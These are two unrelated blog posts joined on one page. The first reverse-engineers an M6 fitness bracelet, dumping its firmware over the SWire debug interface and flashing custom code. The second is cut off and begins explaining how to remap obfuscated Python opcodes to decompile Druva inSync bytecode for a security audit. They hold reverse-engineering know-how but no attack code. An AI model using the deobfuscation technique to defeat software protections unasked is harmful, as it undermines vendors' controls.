Reverse Engineering the M6 Smart Fitness Bracelet

Original text by rbaron_

Following a year and a half of sitting inside the house, I set out to improve my wellbeing by getting a new fitness tracker. It worked out better than I expected — hacking on it kept me busy for a couple of months — at the small price of keeping me sitting inside the house even more.

Before starting, I stated my goals as follows. I wanted to:

  1. Understand its hardware
  2. Figure out how to talk to it
  3. Dump its stock firmware
  4. Get it to run custom code, ideally making use of its:
    • GPIO pins (both for input and output)
    • Color display
    • Bluetooth low energy (BLE) capabilities

I documented the process of going through these goals in the following sections. It’s been an incredibly fun journey. I hope you enjoy it as much as I did.

The M6 Fitness Tracker Bracelet(s)

The particular bracelet we are talking about is the M6 from AliExpress. I believe the name is an attempt to piggyback on the popularity of the $50, entry-level Xiaomi Mi Smart Band 6 fitness tracker. At a $6 price point, our device is an even entrier-level bracelet and, to put it politely, it draws a lot of inspiration from the Xiaomi one.

Front of the M6 box

Hardware Overview

Disassembling the plastic case is so easy that it’s difficult to trust the IP67 water resistance rating claimed on the box.

Inside, we see some interesting stuff:

  • A Telink TLSR8232 system-on-a-chip (SoC)
  • A 0.96” (160×80 px) color display
  • A tiny ~100 mAh LiPo battery and USB charging circuit
  • A vibration motor
  • A (most likely) fake heart rate sensor

The Brains

Top view of the printed circuit board

The SoC in the M6 is a Telink TLSR8232 (datasheet). Some specs:

  • 32-bit CPU
    • Closed architecture (usually referred to as tc32, similar to ARM9) — not a lot of resources about it
    • 24 MHz clock speed
  • 16kB of SRAM
  • 512kB of internal flash
  • 32kHz onboard oscillator for low power mode
  • SWS (Single Wire Slave) interface for debugging and programming
  • Integrated Bluetooth Low Energy (BLE) transceiver
  • Low power operation (alleged ~2 uA in deep sleep)

As luck would have it, just a few months ago I had seen a Telink chip in my little, hackable Xiaomi thermometer. At the time, I re-flashed it with @atc1441’s alternative firmware. Even though it’s a different SoC model, this gave me a little hope and a valuable starting point.

Exposed Pads

Bottom view of the printed circuit board (1/2)
Bottom view of the printed circuit board (2/2)

Armed with nothing but a multimeter, a datasheet and good intentions, I tried to find out what these pads are connected to. This is what I came up with:

Pad    SoC Pin #   SoC Pin Label
SWS    01          SWS/ANA_C<7>
DAT    06          ANA_A<4>
TEST   27          ANA_C<1>
TX     18          ANA_B<4>
RX     19          ANA_B<5>

The Single Wire (aka. SWire or SWS) Interface

Now that we identified the brains of the bracelet, we turn to the goal of actually talking to it. If you programmed an ESP32 before, you probably relied on its bootloader and talked to it via UART. If you programmed or debugged an ARM microcontroller before, you probably used the SWD (serial wire debug) protocol.

In Telink-land, the analogous interface is called Single Wire or SWire. This is how apps are loaded into its flash memory, how its memory is read and written, and how it’s debugged at runtime.

The real fun begins, though, when we try to learn more about this interface. The datasheet is almost comically quiet about it, as if pretending it doesn’t exist.

In the real world, where real programmers do real work, these chips are flashed and debugged with Telink’s official Burning and Debugging Tool. In the past, it seems hobbyists could get these devices very easily, but I couldn’t find them in the usual places at the beginning of the project. Now, as I write this post, it seems they recently became available on Mouser.

While the lack of specs and a programmer set the stage for a very unsatisfying dead end, this is, in fact, where things start to get interesting. The deep dive into the SWire specs and alternative tooling has been the most rewarding part of the project. Read on.

The Missing Specs

In what could be the nerdiest Indiana Jones spin-off yet, “the search for the missing SWire specs” brought me to the work of pvvx. Victor, in addition to maintaining a forked and low-power-optimized version of the alternative Xiaomi thermometer firmware from earlier, is a bona fide SWire ninja.

I struck gold when I came across one of his repositories, the TlsrTools. In there, there’s an excerpt of a PDF that contains a brief, two-page description of the SWire protocol. This seems to be a part of an old version of a Telink datasheet that has since been chopped off. That’s great news. We’re back in the game.

The Alternative Programmer

Victor also bootstrapped a whole new open source programmer for some Telink chips based on the beloved and ubiquitous STM32 Blue Pill board. This means that potentially both our roadblocks are removed — we have a (terse) SWire interface spec and a programmer.

At this point I started to really enjoy the process of demystifying SWire. It reminded me of the heartwarming story of when Paul McCartney and John Lennon got on a bus across Liverpool to meet a fellow they heard knew about the B7 chord. Now here I am, getting on the proverbial bus to meet this single fellow I heard knew about the SWire interface.

The bus takes me to interesting places. I can’t recognize the street signs, but the view looks amazing. I imported the STM32 code into my editor and translated some of its Russian comments.

This cross-language detective work gave me a relatively good understanding of the SWire protocol and of how to use Victor’s alternative programmer. There’s still one pressing question remaining, though. Victor’s programmer is made for TLSR826x chips, and we’ve got a TLSR8232 chip on our hands.

From Pascal to Python

There are usually three moving parts when programming/debugging a chip:

  1. The target board we want to program
  2. The programmer hardware
  3. The computer software that talks to the programmer

In Victor’s alternative programmer, the computer software is a Pascal, Windows-only application. I think it is a prime example of getting real stuff done with the language at hand.

The role of the computer software is to send commands to the programmer hardware and get it to read/write data from/to the target board. As I don’t have a Windows box at home, I implemented a barebones Python script, tlsr82-debugger-client.py, that works as the computer software component.

We can now use this Python script and the STM32 to hopefully speak SWire with our M6 bracelet. The setup is as follows:

The STM32-based alternative programming setup

SWire Protocol Overview

Let’s take a dip into the mysterious SWire spec.

As the name suggests, a single wire is used for transmitting data back and forth between two devices. In our case, the STM32 programmer (the master) and the target board (the slave). There is no separate clock line as in SPI or I2C. The single wire topology allows for both devices to speak, but they cannot speak at the same time. In other words, we can call SWire an asynchronous, half-duplex interface.

These two key aspects of SWire imply that:

  • Asynchronous: since there’s no shared clock, both devices must somehow employ compatible reading & writing speeds
  • Half duplex: each device must know when it should listen to messages and when it’s allowed to transmit messages. There must be a precisely choreographed dance between the two parties

To achieve coordination, the SWire protocol attributes responsibilities to the master and slave devices. The master is responsible for initiating the communication and managing the bus logic level between data transfers. The slave is responsible for sending data when it’s expected to. I put together some real-world examples below to make this clearer.

Sending a Single Bit

The first thing to notice is how bits are encoded in the wire. Each bit is transmitted in five units of time:

  • To send a 0, keep the voltage low for one unit and high for 4 units;
  • To send a 1, keep the voltage low for 4 units of time and high for 1 unit;

To make matters concrete, here is a real SWire transmission I captured with a logic analyzer:

Example of a 0 and a 1 in SWire

In the above screenshot, there are 8 bits being transmitted between the flags marked as 25 and 26. Can you decode these 8 bits? If you’re feeling brave, let me know your answer.

Sending a Single Byte

We now know how individual bits look in the wire. To transmit a full byte, the SWire protocol specifies that 9 bits are needed:

  • Bit 1: The cmd bit. 0 specifies that the message contains data and 1 specifies that the message is a command
  • Bits 2-9: The message content (8 bits)
  • One time unit of low level to signal the end of the message

Again, let’s take a look at a real-world example transmission of a 0xb0 byte:

Example of sending one byte in SWire

After the last unit of low is sent, the bus is released and goes back to its natural high voltage. In other words, the SWire data bus is pulled high.
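To make the bit and byte encodings above concrete, here is a minimal Python sketch of the framing (illustration only — on the real setup the timing units are generated by the STM32 programmer firmware, and MSB-first bit order is assumed here):

# Encode SWire bits/bytes as lists of logic levels, one entry per time unit.

def encode_bit(bit):
    # 0: one unit low, four units high. 1: four units low, one unit high.
    return [0, 1, 1, 1, 1] if bit == 0 else [0, 0, 0, 0, 1]

def encode_byte(value, cmd=0):
    units = encode_bit(cmd)               # cmd bit: 0 = data, 1 = command
    for i in range(7, -1, -1):            # 8 content bits, assumed MSB first
        units += encode_bit((value >> i) & 1)
    units.append(0)                       # one unit of low ends the message
    return units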

Write Requests

We saw how individual bits and bytes are encoded in the wire. Next, let’s take a look at how the SWire protocol specifies a byte to be written at a specific address. In this scenario, the master wants to write a byte b to the address addr in the slave’s memory.

To do so, the master must send a sequence of bytes, each one encoded as described in the section above:

  1. The START byte. This one always has the value 0x5a
  2. The most significant 8 bits of the target addr
  3. The least significant 8 bits of the target addr
  4. The RW_ID byte. The most significant bit should be set to 0 for writing operations
  5. The byte value b
  6. The END byte. It always has the value 0xff

Let’s look at the following example:

SWire write request

Example of writing data in SWire

In this example, we can see the byte 0x05 being written into the slave’s memory address 0x0602.
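Putting that frame format into code, here is a rough sketch of what a make_write_request-style helper could look like (the actual implementation lives in tlsr82-debugger-client.py; the value of the non-MSB bits of RW_ID is an assumption here):

START_BYTE = 0x5a
END_BYTE = 0xff

def make_write_request(addr, data):
    # Build the byte sequence for a SWire write request. Each of these bytes
    # is then serialized on the wire using the 9-bit scheme described above.
    frame = [START_BYTE]
    frame.append((addr >> 8) & 0xff)  # most significant address byte
    frame.append(addr & 0xff)         # least significant address byte
    frame.append(0x00)                # RW_ID: MSB = 0 means "write"
    frame.extend(data)                # one or more data bytes
    frame.append(END_BYTE)
    return frame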

Variations of the SWire Protocol

It’s worth noting that there exists at least one variation of the SWire protocol. In the other variant, the master sends 3 bytes of addr after the START byte, instead of only two bytes in our SWire protocol. The 3-byte variant is employed, for example, in Telink’s TLSR8251 SoCs, used in the Xiaomi thermometer we mentioned above. In the Python-based flasher in ATC_MiThermometer repository, we can see where the 3 bytes of addr are specified in the read/write requests from the master to the slave device.

Writing multiple bytes

That’s a lot of overhead for writing a single byte. Luckily, the protocol lets us write multiple data bytes at once. To do so, the master simply sends a sequence of bytes instead of a single byte like in the example above.

Read Requests

Read requests are very similar to write requests. There are only two important differences:

  1. The most significant bit of the RW_ID byte is set to 1
  2. Instead of sending data after the RW_ID byte, the master reads data from the SWire data line

Again, take the following example. To make things more interesting, in this example the master reads two bytes from the slave:

Example of reading data in SWire

After sending the RW_ID byte, the master sends one unit of low level. The slave responds with 8 bits of data and one unit of low level. The master can request more data by writing a single unit of low level, otherwise the master sends the END byte (0xff) and the transmission is over.

Let’s zoom into the transmission of multiple bytes during the read request, just after the RW_ID byte above:

Zoom into the multi-byte read request

In this example, the master reads the value 0x5316 from the slave’s address 0x007e.

The address 0x007e we just read is, in fact, a special register in the TLSR82xx chips. It holds the “Chip ID”. For our TLSR8232, the Chip ID is 0x5316.

You can find this whole annotated logic analyzer capture in get_soc_id.sal. It includes read and write requests.

Speed Mismatch Hazard

In the read example above, we saw that both the master and slave read and write to the same bus. They must understand each other’s messages. A crucial setting is the speed at which both devices transmit data.

Let’s turn to the following pathological example. It is the same read request for address 0x007e as above:

Example of speed mismatch between the master and slave

Take a look at what happens after the master sends its RW_ID byte. The slave starts responding, but at a visibly lower speed. We can see that the bits are encoded in much wider windows than the previous ones sent from the master. Also note that, even though the whole transmission failed, the beginning of the slave’s response seems promising. It starts with 0x16, which is the expected first byte of the “Chip ID”.

This speed mismatch is a problem. It breaks the precise dance that the master has to coordinate. But not all is lost — from this observation we can draw two important conclusions — a bad one and a good one:

  1. Bad one: To read data, the slave’s speed has to be compatible with the master’s speed, otherwise the master fails to coordinate the whole operation. I believe we could find a solution that adjusts this speed and gets the master to adapt its pace to the slave’s speed, but this is not currently done
  2. Good one: Writing data seems to be a less coordination-sensitive operation. As we noted above, the slave seems to have been able to correctly understand the bytes sent from the master (which spell “read request for address 0x007e”), even though the slave itself is misconfigured with a slower speed

The last piece of the speed puzzle is that we can configure the slave’s speed by writing to one of its special registers. From the “missing SWire spec”, we see a little note about the register at the address 0xb2:

Slave’s SWire speed control register

In short, we can tune the slave’s SWire speed by writing to its 0xb2 memory address.

On the other end, we also need to set up the master’s SWire speed.

The strategy that has worked is to fix the master’s SWire speed at a reasonable value and try a few possible speeds for the slave. This is precisely what our Python script does (edited for brevity):

# Writes the value `speed` into the slave's 0x00b2 register.
def set_speed(speed):
    return write_and_read_data(make_write_request(0x00b2, [speed]))

def find_suitable_sws_speed():
    for speed in range(2, 0x7f):
        set_speed(speed)
        try:
            get_soc_id()
        except Exception:
            continue
        else:
            print(f'Found and set suitable SWS speed: {speed}')
            return speed
    raise RuntimeError("Unable to find a suitable SPI speed")

def init_soc(sws_speed=None):
    ...
    # Set up the master speed.
    set_pgm_speed(0x03)

    # If the user specified a slave speed, use that.
    if sws_speed is not None:
        set_speed(sws_speed)
    # Otherwise try many different ones until one works.
    else:
        find_suitable_sws_speed()

Invalid CPU State Hazard

Another tricky trap is the fact that sometimes the slave’s CPU does not seem to respond to SWire requests. I haven’t found the precise reason, but my guess is that SWire doesn’t work when the slave is in some power saving mode or has interrupts disabled.

In practice, it means that it can be difficult to start a SWire exchange depending on the program that is running on the target device. To overcome this, pvvx’s strategy is to:

  • Reset the device (by pulling its RST pin low)
  • Start bombarding the target device with “CPU stop” SWire commands while the RST pin is pulled high

The objective here is to reach the CPU in a good state as it resets, before the application messes with it too much.

Trick for stopping the CPU as early as possible

For the extra curious reader, the “CPU stop SWire command” is a simple write request of 0x05 to address 0x0602. This address corresponds to a special register that controls the CPU state.
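In terms of the helpers we saw earlier, the bombardment is essentially a tight loop around a write request like this:

# "CPU stop": write 0x05 to the CPU control register at address 0x0602.
write_and_read_data(make_write_request(0x0602, [0x05]))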

Getting to the RST Pin

The RST trick above works really well. The only downside is that, if you look at the M6 board, the RST pin is not broken out to any pad.

Getting to the RST pin. Toothpick for scale

In the datasheet, we can see that the TLSR8232 RST is on pin 26. On the M6 board, this pin connects directly to a tiny capacitor, as shown in the photo above. This is a tricky soldering job, but it’s doable with a pre-tinned wire and a little bit of flux.

Alternative Tricks — No RST Soldering Required (Possibly)

While having the RST pin available makes life easier and working with SWire more predictable, it might not be strictly necessary. Two ideas to get around it:

  1. Just try it without the RST pin. You might find that it just works. In fact, if you look at how the Xiaomi thermometer alternative firmware is flashed, you will find out that the RST is not needed there
  2. As a last resort, you can try to manually power cycle the target board while the “CPU stop” bombardment is going on. You might try to tweak the code to increase this time window

Reading the SoC ID

With the content we covered so far, we are ready to take a look at a real-world scenario. Using the tlsr82-debugger-client.py Python script to read the target device’s memory:

% python tlsr82-debugger-client.py --serial-port /dev/cu.usbmodem6D8E448E55511 get_soc_id
Trying speed 2
Trying speed 3
Trying speed 4
Trying speed 5
Trying speed 6
Trying speed 7
Found and set suitable SWS speed: 7
SOC ID: 0x5316

Behind the scenes, this invocation takes some of the steps we covered previously:

  1. Reset the target board by pulling RST low
  2. Bombard the target board by writing many “CPU stop” values to its CPU control register while RST is pulled high
  3. Set up the master’s SWire speed
  4. Iterate over possible SWire speeds for the target board until a suitable one is found
  5. Issue a 2-byte read request to address 0x007e

Reading and Writing to the Internal Flash Memory

One of our goals is to dump the target board’s firmware. It is stored in the board’s internal flash memory. While the details of the SWire protocol are not public, Telink does offer an SDK for the TLSR8232 SoC. In there, there is an interesting file, ble_sdk_hawk/drivers/5316/flash.c, that contains the code for the chip to read and write its own internal flash — comments are my own:

_attribute_ram_code_ void flash_write_page(unsigned long addr, unsigned long len, unsigned char *buf){
  unsigned char r = irq_disable();

  // Writes value 6 to register 0x0d (spi control register).
  flash_send_cmd(FLASH_WRITE_ENABLE_CMD);
  // Writes value 2 to register 0x0d (spi control register).
  flash_send_cmd(FLASH_WRITE_CMD);
  // Writes 3 bytes of the target address to register 0x0c (spi data register).
  flash_send_addr(addr);

  unsigned int i;
  for(i = 0; i < len; ++i){
    // Write data byte to register 0x0c (spi data register).
    mspi_write(buf[i]);
    mspi_wait();
  }
  // Chip select high.
  mspi_high();
  flash_wait_done();

  irq_restore(r);
}

_attribute_ram_code_ void flash_read_page(unsigned long addr, unsigned long len, unsigned char *buf){
  unsigned char r = irq_disable();

  // Writes value 3 to register 0x0d (spi control register).
  flash_send_cmd(FLASH_READ_CMD);
  // Writes 3 bytes of the target address to register 0x0c (spi data register).
  flash_send_addr(addr);

  // Dummy write to register 0x0c (spi data register).
  mspi_write(0x00);
  mspi_wait();
  // Writes value 0x0a to register 0x0d (spi control register).
  mspi_ctrl_write(0x0a);
  mspi_wait();
  /* get data */
  for(int i = 0; i < len; ++i){
    // Reads byte from register 0x0c (spi data register).
    *buf++ = mspi_get();
    mspi_wait();
  }
  // Chip select high.
  mspi_high();

  irq_restore(r);
}

We can see that interacting with the internal flash boils down to writing to the target board’s SPI control register (at address 0x0d) and reading/writing to the SPI data register (0x0c), as well as manipulating the SPI chip select logic level.

Since we know how to interact with the target board’s memory addresses via SWire, we can implement the exact same operations in our Python script, targeting reads and writes to the SPI control and data registers (0x0d and 0x0c, respectively). This is exactly what I did. For instance, check out the write_flash function:

def write_flash(addr, data):
    send_flash_write_enable()

    # Chip select low.
    write_and_read_data(make_write_request(0x0d, [0x00]))

    # Write command.
    write_and_read_data(make_write_request(0x0c, [0x02]))

    # Flash address.
    write_and_read_data(make_write_request(0x0c, [(addr >> 16) & 0xff]))
    write_and_read_data(make_write_request(0x0c, [(addr >> 8) & 0xff]))
    write_and_read_data(make_write_request(0x0c, [addr & 0xff]))

    # Write data
    write_and_read_data(make_write_request(0x0c, data))

    # CSN high.
    write_and_read_data(make_write_request(0x0d, [0x01]))

The read_flash function works similarly.
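For reference, here is a sketch of what read_flash can look like, mirroring the SDK’s flash_read_page sequence over SWire. This is an illustration rather than the exact code from the repository: make_read_request is assumed to be the read counterpart of make_write_request, and write_and_read_data is assumed to return the bytes read back.

def read_flash(addr, length):
    # Chip select low.
    write_and_read_data(make_write_request(0x0d, [0x00]))

    # Read command (FLASH_READ_CMD = 0x03).
    write_and_read_data(make_write_request(0x0c, [0x03]))

    # Flash address, 3 bytes.
    write_and_read_data(make_write_request(0x0c, [(addr >> 16) & 0xff]))
    write_and_read_data(make_write_request(0x0c, [(addr >> 8) & 0xff]))
    write_and_read_data(make_write_request(0x0c, [addr & 0xff]))

    # Dummy write, then switch the SPI controller to read mode (0x0a),
    # just like flash_read_page does.
    write_and_read_data(make_write_request(0x0c, [0x00]))
    write_and_read_data(make_write_request(0x0d, [0x0a]))

    # Read `length` bytes back from the SPI data register.
    data = write_and_read_data(make_read_request(0x0c, length))

    # Chip select high.
    write_and_read_data(make_write_request(0x0d, [0x01]))
    return data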

Dumping the Firmware

With the ability to read the target board’s internal flash over SWire, we can now dump the M6’s firmware:

$ python tlsr82-debugger-client.py --serial-port /dev/cu.usbmodem6D8E448E55511 dump_flash flash.bin
Found and set suitable SWS speed: 7
Dumping flash to flash.bin...
CPU stop.
CSN high.
0x000000 00.00%
0x000100 00.05%
0x000200 00.10%
...
0x07cd00 99.85%
0x07ce00 99.90%
0x07cf00 99.95%
Writing 512000 bytes to flash.bin

You can find the raw dump in the project’s repository, under dumped/flash.bin.

SDK, Compiler & Docker Image

With the first major goal of dumping the firmware behind us, we now turn to the challenge of running our own code on it. The first step is to get the SDK and compiler for the TLSR8232.

The SDK is available on Telink’s website. The one I used is listed in the “Bluetooth LE Generic” section. Unpacking the SDK reveals it’s integrated with Telink’s own IDE, which is based on the Eclipse IDE and seems to be available only for Windows. This is fine, but I would love to make things easier by creating a single Dockerfile with the whole environment needed for compiling TLSR8232 programs.

Googling around brought me to the Ai-Thinker-Open/Telink_825X_SDK repository. It contains an SDK for Telink chips and refers to a Linux tc32 toolchain, which is exactly what we need for running it under Docker. I used the tc32 toolchain and the TLSR8232 BLE SDK and set up a Dockerfile that makes compiling our custom code simpler.

With this, we can simply spin up a Docker container and type make to compile our code. We can build the blinky binary by doing:

# In the example-programs directory.
# Build the Docker image from the Dockerfile.
$ docker build -t tlsr8232 .

# Run the Docker containers and mount the current directory into /app.
$ docker run -it --rm -v "${PWD}":/app tlsr8232

# Inside the docker container, compile the blinky example.
$ cd blinky/
$ make
...

# The compiled binary file is in _build/blinky.bin.
$ ls _build/blinky.bin
_build/blinky.bin

Blinky

The time has come. We now have all the tools and knowledge to compile and burn our own little firmware on the M6 bracelet. I hooked up a red LED to the TX pad and set out to make it blink.

The sample code for the blinky can be found in the GitHub repo under example-programs/blinky. Here is the entirety of its main() function:

int main() {
  cpu_wakeup_init();
  clock_init(SYS_CLK_16M_Crystal);
  gpio_init();

  // TX pad.
  gpio_set_func(GPIO_PB4, AS_GPIO);
  gpio_set_output_en(GPIO_PB4, 1);
  gpio_set_input_en(GPIO_PB4, 0);
  gpio_write(GPIO_PB4, 1);

  while (1) {
    gpio_toggle(GPIO_PB4);
    sleep_ms(500);
  }
  return 0;
}

As we did all the hard work of setting up the SDK & toolchain within our Docker image, compiling it is a breeze, as we saw in the previous section. We just have to use our Dockerfile, mount the example-programs/ repository directory into /app and type make on the example we want to build:

root@c54c8204641d:/app/blinky# make
mkdir -p _build/drivers
...
/opt/tc32/bin/tc32-elf-gcc -c -Wall -std=gnu99 -DMCU_STARTUP_5316 -I /opt/8232_BLE_SDK/ble_sdk_hawk/ -ffunction-sections -fdata-sections -o _build/main.o main.c
/opt/tc32/bin/tc32-elf-ld --gc-sections -T /opt/8232_BLE_SDK/ble_sdk_hawk/boot.link -o _build/blinky _build/main.o _build/drivers/gpio.o _build/drivers/analog.o _build/drivers/clock.o _build/drivers/bsp.o _build/drivers/adc.o _build/asm/cstartup_5316.o /opt/8232_BLE_SDK/ble_sdk_hawk/proj_lib/liblt_5316.a
/opt/tc32/bin/tc32-elf-objcopy -O binary _build/blinky _build/blinky.bin

Burning the compiled firmware in the M6 board is done with our trusty Python script:

$ python tlsr82-debugger-client.py --serial-port /dev/cu.usbmodem6D8E448E55511 write_flash ../example-programs/blinky/_build/blinky.bin
Found and set suitable SWS speed: 7
Erasing flash...
Flash status: 03
Flash status: 00
Writing flash from ../example-programs/blinky/_build/blinky.bin...
0x0000 00.00%
0x0100 03.35%
0x0200 06.71%
...
0x1c00 93.92%
0x1d00 97.27%
Flash status: 00

Immediately after the command finishes, the M6 board should do its thing:

A love letter to the «yOu ShOuLd HaVe uSeD a 555» gang

The Capacitive Button

The touch pad in the M6 is not connected directly to the TLSR SoC, but instead passes through a driver IC on the board. I suspect the IC is responsible for managing the touch-sensing circuitry and piping a clean digital signal to the SoC, but I couldn’t easily identify the mysterious IC.

To figure out the corresponding SoC button pin, I used a binary search approach. I first identified all GPIO pins that hadn’t been used yet and set them all up as inputs. I then iterated over them and checked whether any of them changed state as I touched the button, toggling the LED if that happened. I then partitioned the GPIO pins under test into two groups and repeated the process on the group that responded. It’s not very elegant, but I got to the actual pin in no time.

It turns out the button state can be read from the GPIO_PC2 pin. Here’s the result of running the example-programs/button firmware:

Touching the capacitive button turns the LED off

Display

The next goal is to draw something on the display. The first task is to identify the hardware. After a lot of googling and guessing, I found the exact same display on AliExpress.

It is a 13-pin, 160×80 px, color SPI TFT display. It’s a little weird that the data lines are called SDA and SCL (which are often seen in I²C devices). I believe they are, in fact, MOSI and SCLK in disguise.

Overlaid pin labels on the display connector

It uses the ST7735 driver (PDF) to push pixels to the screen. This is good news, as this driver is relatively popular among color displays. It’s featured in many maker-friendly products and supported by Adafruit’s ST7735 library. While Adafruit’s library is built on top of Arduino abstractions and we’re very far from that, it proved to be a great reference.

Next, again, the task is to figure out which SoC pins the display is connected to. Long story short:

Display pin   SoC Pin #   SoC Pin Label   Function
SDA           29          SWS/ANA_C<3>    SPI data
SCL           31          ANA_C<5>        SPI clock
RS            32          ANA_C<6>        Data/command selector (D/C# in the ST7735 datasheet)
CS            03          ANA_A<1>        SPI chip select, active low
RST           02          ANA_A<0>        Reset pin, active low
LEDK          04          ANA_A<2>        TFT backlight diode cathode; driven through an NPN transistor

To draw a single pixel on the display, we need to take the following actions:

  1. Turn on the display’s backlight by driving its LED cathode (LEDK pin)
  2. Pull RST high
  3. Set up SPI with pins SDA & SCL on the target board
  4. Send a bunch of commands to the ST7735 driver. These include:
    1. Get out of sleep mode
    2. Set up the color format (here I’m using RGB565, with 16 bits per pixel)
    3. Set up the display’s physical dimensions
    4. Turn the display on
  5. Send a command to define the drawing region
  6. Send 16 bits of color for a single pixel

Getting all the details right was not an easy task. Most of the time it feels like working with a black box — there’s no feedback and the error could be anywhere, from the display identification to the pin mapping to the program logic to firmware burning errors.

Which tools did I use? Yes.

In the end, through blood, sweat and tears, it finally worked. The example-programs/display draws some color squares in the middle of the screen:

Display squares
Display pins

Drawing Text

Given we know how to draw individual pixels on the display, drawing text boils down to figuring out which pixels should be drawn for each character.

A bitmap font fits the bill perfectly. In a bitmap font, each character is just an array of bits, in which a 0 represents background and a 1 represents a pixel we need to draw.

Let’s borrow the Picopixel bitmap font from the Adafruit GFX library.

As an example, if we dig a little bit, we find that the letter A is 3 pixels wide x 5 pixels high and is encoded in the two bytes 0x57 0xda. We start by unrolling those bytes into their binary representation:

0x57 0xda => 0101011111011010

We know this particular character is 3 pixels wide, so we lay that bit sequence into rows, 3 bits at a time:

010
101
111
101
101

And just like magic, if we paint the 1 bits, we see the letter 'A' come up:

 #
# #
###
# #
# #

I implemented this idea in example-programs/text. It’s nice to notice that this algorithm generalizes well for scaling up text. We can target groups of 2×2, 3×3 or 4×4 pixels as if they were one single superpixel.
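Here is a rough Python illustration of that unrolling (the actual firmware does the same thing in C); the scale parameter plays the role of the superpixel factor mentioned above:

def render_glyph(data, width, height, scale=1):
    # Unroll the glyph's bytes into one flat bit string, MSB first.
    bits = ''.join('{:08b}'.format(b) for b in data)
    for row in range(height):
        line = ''
        for col in range(width):
            on = bits[row * width + col] == '1'
            line += ('#' if on else ' ') * scale   # horizontal superpixels
        for _ in range(scale):                     # vertical superpixels
            print(line)

# The letter 'A' from the Picopixel font: 3x5 pixels packed into 0x57, 0xda.
render_glyph([0x57, 0xda], width=3, height=5)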

A dramatic example of text drawing

Bluetooth Low Energy — Peripheral Role

To get started with BLE, I set up the TLSR8232 in peripheral mode and defined a BLE characteristic that toggles an LED when it’s written to. In example-programs/ble-services, I hooked an LED to the TX pad:

Bluetooth Low Energy Blinky

In the previous video, I’m using the nRF connect iOS app to connect to the M6 board and interact with the BLE services I defined in the firmware.

Bluetooth Low Energy — Central Role

For the grand finale, I set out to use the M6 as a BLE tracker for another project of mine — the b-parasite soil moisture/air temperature and humidity sensor.

The b-parasite broadcasts its sensor readings via BLE advertisement packets. I thought it would make an interesting demo if I could capture those broadcasts with the M6 and print the sensor values on its display.

As we know the MAC address of b-parasites, we can filter the relevant advertisements with it. Once we identify a b-parasite advertisement, we look into its raw bytes to decode the sensor values:

// BLE advertisement callback. Called whenever a new advertisement
// packet comes in.
int hci_event_handle(u32 h, u8 *param, int n) {
  ...
  event_adv_report_t *p = (event_adv_report_t *)param;
  ...
  // Is this a b-parasite advertisement?
  if (p->mac[5] == 0xf0 && p->mac[4] == 0xca && p->mac[3] == 0xf0 &&
      p->mac[2] == 0xca && p->mac[1] == 0x00 && p->mac[0] == 0x08) {
    ...
    // Decode sensor values from the advertisement payload.
    b_parasite_adv_t bp_data;
    bp_data.counter = p->data[8];
    bp_data.battery_millivoltage = p->data[9] << 8 | p->data[10];
    bp_data.temp_millicelcius = p->data[11] << 8 | p->data[12];
    bp_data.air_humidity = p->data[13] << 8 | p->data[14];
    bp_data.soil_moisture = p->data[15] << 8 | p->data[16];

    // Draw values on the display.
    draw_parasite_data(&bp_data);
    ...
}

The full code for the demo is in example-programs/ble-b-parasite-tracker. Here’s the result:

Bluetooth Low Energy & b-parasite

Final Words

If you made it this far, thanks for reading. I hope you enjoyed it. As much as it is a lot of fun, writing posts like this takes a lot of time and effort. If you want to show your support, consider following me on Twitter.

Remapping Python Opcodes

Original text by Chris Lyne

In my previous blog post, I talked about compiled Python (.pyc) files that I couldn’t manage to decompile. Because of this, my ability to audit the source code of Druva inSync was limited, and I felt compelled to dig deeper. What I found was that all of the operation codes (opcodes) had been shuffled around. This is a known technique for obfuscating Python bytecode. I’ll take you step by step through how I fixed these opcodes to successfully recover the source code. This technique is not limited to Druva and can generally be used to remap any Python opcodes.

Let’s first look at the problem.

It won’t decompile

In the installation directory of Druva inSync, you’ll notice that there is a Python27.dll and library.zip. When inSync.exe boots up, these files are immediately read. I’ve filtered the procmon output for brevity. This behavior is indicative of an application built with py2exe.

When you unzip library.zip, it contains a bunch of compiled Python modules — custom and standard. Shown below is a subset of the whole.

.pyc’s can often be decompiled pretty quickly by tools like uncompyle6. For example, struct.pyc is part of the Python standard library, and it decompiles just fine — only a few imports.

Decompiling normal struct.pyc

Now, doing the same against the struct.pyc packaged in library.zip, here’s the output:

Decompiling Druva struct.pyc

Unknown magic number 62216.

But why?

If you were to look at a .pyc file in a hex editor, the magic number is in the first 2 bytes of the file, and it will be different depending on the Python version that compiled it. For example, here is 62216:

Druva magic number

62216 is not a documented magic number. But 62211 is close to it, and that corresponds to version 2.7.

What’s strange is that the python27.dll distributed in the Druva inSync installation is version 2.7, hence the DLL name. Yet, its magic number is different.

Druva python27.dll

This looks nearly identical to the normal 2.7.15150.1013 DLL.

Normal python27.dll

The size and modified date are a little different, but the version is the same. If the version is the same, why is the magic number not 62211?

Digging into the OpCodes

My next idea was to load up a Python interpreter using the Druva inSync libraries. I did this by first dropping the Druva python27.dll into c:\Python27. I also had to ensure that the search path pointed to the Python modules distributed with Druva inSync.

Python interpreter with Druva libraries loaded

At this point, I could load the ‘opcode’ module to view the map of opcodes.

Druva opcode map

Below is the normal Python 2.7 opcode map:

Normal opcode map

Notice that the opcodes are completely different. For example, ‘CALL_FUNCTION’ maps to 131 normally, and its opcode is 111 in the Druva distribution. As far as I can tell, this is true for every operation.

Remapping the OpCodes

In order to decompile these obfuscated .pyc files, the opcodes need to be remapped back to the original Python 2.7 mapping. Easy enough, right? It’s slightly more complicated than it appears on the surface. In order to accomplish this, one needs to understand the .pyc file format. Let’s take a look at that.

Structure of a .pyc

Let’s turn to the code to make sense of the .pyc file structure. We are looking at the py_compile module’s compile function. This function will convert a .py file into a .pyc.

Starting at line 106, timestamp is first populated with the .py file’s last modification time (st_mtime). And on line 111, the source code is read into codestring.

Next, the source code is compiled into a code object using the builtin compile function. Since the .py likely contains a sequence of statements, the ‘exec’ mode is specified.

Assuming no errors occur, the new filename is created (cfile). If basic optimizations were turned on via the -O flag (__debug__ tells us this), the extension will be ‘.pyo’, otherwise it will be ‘.pyc’.

Finally, the file is written to. The first 4 bytes will be the magic string value, returned by imp.get_magic(). Next, the timestamp is written. And finally, the code object is serialized using the marshal module.

Let’s look at an example by compiling our own module.

Example: Hello world

Here’s our friend, hello.py. It’s just a print statement.

If we compile it, it spits out a hello.pyc file.

Here is a hexdump of hello.pyc

If we were to load this up, we can actually parse out the individual components. First we read the file and store the contents in bytes:

The magic string is 03f30d0a; however, the magic number is 03f3. It’s always followed by 0d0a.

